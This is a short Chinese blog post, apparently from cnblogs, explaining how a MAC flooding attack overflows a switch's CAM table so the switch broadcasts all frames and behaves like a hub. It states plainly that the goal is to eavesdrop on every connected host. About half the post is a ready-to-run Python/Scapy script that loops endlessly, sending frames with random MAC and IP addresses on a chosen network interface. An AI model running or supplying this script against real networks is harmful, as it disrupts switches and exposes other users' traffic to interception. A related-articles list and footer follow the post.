• MAC洪水攻击



    MAC洪水攻击原理

      传统的交换机在数据转发过程中依靠对CAM表的查询来确定正确的转发接口,一旦在查询过程中无法找到相关的目的MAC对应的条目,此数据帧将作为广播帧来处理,CAM表的容量有限,只能存储不多的条目,当CAM表记录的MAC地址达到上限时,新的条目将不会添加到CAM表中。

      基于以上原理,某台PC不断发送去往未知目的地地数据帧,且每个包地源MAC地址都不同,当这样地数据包发送地速度足够快之后,快到在刷新时间内将交换机地CAM表迅速填满。CAM表被这些伪造的MAC地址占据,真实的MAC地址条目却无法进入CAM表。那么任何一个经过交换机的正常单播数据帧都会以广播帧的形式来处理。交换机在此情况下被降级为Hub。

      交换机降级为hub之后,我们就可以监听所有连接到该交换机的主机的数据了。

    #!/usr/bin/python

    import sys
    from scapy.all import *

    packet = Ether(src=RandMAC("*:*:*:*:*:*"),
    dst=RandMAC("*:*:*:*:*:*")) /
    IP(src=RandIP("*.*.*.*"),
    dst=RandIP("*.*.*.*")) /
    ICMP()

    if len(sys.argv) < 2:
    dev = "eth0"
    else:
    dev = sys.argv[1]

    print "Flooding net with random packets on dev " + dev

    sendp(packet, iface=dev, loop=1)

  • 相关阅读:
    OC学习笔记
    feed43+ifttt
    让Hyper-V和VMware虚拟机软件共存
    ios问题集
    vs2012问题集
    第二个win8应用制作笔记
    隐私策略
    《龙泉青瓷》隐私策略
    win8开发-Xaml学习笔记四
    梦想成为“老板”的第N天
  • 原文地址:https://www.cnblogs.com/blacksunny/p/7018523.html
Copyright © 2020-2023  润新知